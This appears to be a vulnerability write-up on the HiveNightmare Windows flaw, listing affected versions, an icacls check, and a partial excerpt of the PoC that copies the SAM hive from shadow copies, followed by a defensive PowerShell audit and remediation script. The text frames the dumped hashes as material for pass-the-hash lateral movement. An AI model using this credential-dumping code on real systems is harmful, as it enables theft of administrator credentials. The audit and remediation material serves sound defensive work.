Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server, version 2004 (Server Core installation)
Windows 10 Version 2004 for x64-based Systems
Windows 10 Version 2004 for ARM64-based Systems
Windows 10 Version 2004 for 32-bit Systems
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1809 for x64-based Systems
0x02 Vulnerability reproduction
Run this command with Admin privileges:

icacls c:\Windows\System32\Config\SAM

If the output contains BUILTIN\USERS:(I)(RX), the vulnerability is present.
Jonas L discovered an access-permission issue in Win11: non-admin users can access the sensitive configuration files under c:\Windows\System32\config\, which include credential material such as the SAM. Through this permission issue, a non-admin user can read out the administrator's hash credentials. On an internal network, we can then carry out pass-the-hash and other lateral movement.
The relevant excerpt from the HiveNightmare PoC (its main() and helper functions such as getVssFileHandle and dumpHandleToFile are not shown here):

wcout << L"\nHiveNightmare v0.5 - dump registry hives as non-admin users\n\n"
         L"Specify maximum number of shadows to inspect with parameter if wanted, default is 15.\n\n"
         L"Running...\n\n";

// Look for a readable copy of the SAM hive in the VSS shadow copies (up to searchDepth of them)
hFile = getVssFileHandle(samLocation, searchDepth);
if (hFile == INVALID_HANDLE_VALUE) {
    wcout << "Could not open SAM :( Is System Protection not enabled or vulnerability fixed? "
             "Try increasing the number of VSS snapshots to search - list snapshots with vssadmin list shadows\n";
    return -1; // error handling for a failed read of Windows\System32\config\SAM
} else {
    getFileTime(hFile, fileTime, 200);
    swprintf_s(fileName, L"SAM-%s", fileTime); // buggy if name too long
    dumpHandleToFile(hFile, fileName);
    CloseHandle(hFile); // done, close the file handle
    wcout << endl << L"Success: SAM hive from " << fileTime
          << L" written out to current working directory as " << fileName << endl << endl;
}
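An added PowerShell audit, not part of the original post and not HiveNightmare's own code: it performs the ACL check from the icacls command above across the SAM, SYSTEM and SECURITY hives, lists the shadow copies the tool walks, and with -Remediate applies Microsoft's published inheritance workaround. It assumes it is run from an elevated prompt on the host being checked.

```powershell
# Added example (not from the original post). Assumed: run as Administrator.
param([switch]$Remediate)

$configDir = Join-Path $env:windir 'System32\Config'
$hives = 'SAM', 'SYSTEM', 'SECURITY'
$findings = @()

foreach ($hive in $hives) {
    $path = Join-Path $configDir $hive
    $acl = Get-Acl -Path $path
    # Vulnerable state: BUILTIN\Users holds an Allow ACE that grants read access
    # (this is the BUILTIN\USERS:(I)(RX) line that icacls prints).
    $usersRead = $acl.Access | Where-Object {
        $_.IdentityReference -eq 'BUILTIN\Users' -and
        $_.AccessControlType -eq 'Allow' -and
        ($_.FileSystemRights -band [System.Security.AccessControl.FileSystemRights]::ReadData)
    }
    $findings += [pscustomobject]@{ Hive = $hive; UsersCanRead = [bool]$usersRead }
}
$findings | Format-Table -AutoSize

# The live hive files are locked, so a readable ACL only matters if a copy exists that a
# low-privileged user can reach; that is why the tool above searches VSS shadows.
$shadows = Get-CimInstance -ClassName Win32_ShadowCopy
"Shadow copies present: $($shadows.Count)"
$shadows | Select-Object ID, InstallDate, VolumeName | Format-Table -AutoSize

if ($Remediate -and ($findings.UsersCanRead -contains $true)) {
    # Microsoft's published workaround: re-enable ACL inheritance on the hive files.
    # Shadow copies taken before this still contain the readable copies, and removing
    # them also removes System Restore points, so that is left as a deliberate manual step.
    icacls "$configDir\*.*" /inheritance:e
    Write-Host "Inheritance restored. Review and remove shadow copies created before this fix."
}
```

Run it without -Remediate first to record which hosts report UsersCanRead = True before changing anything.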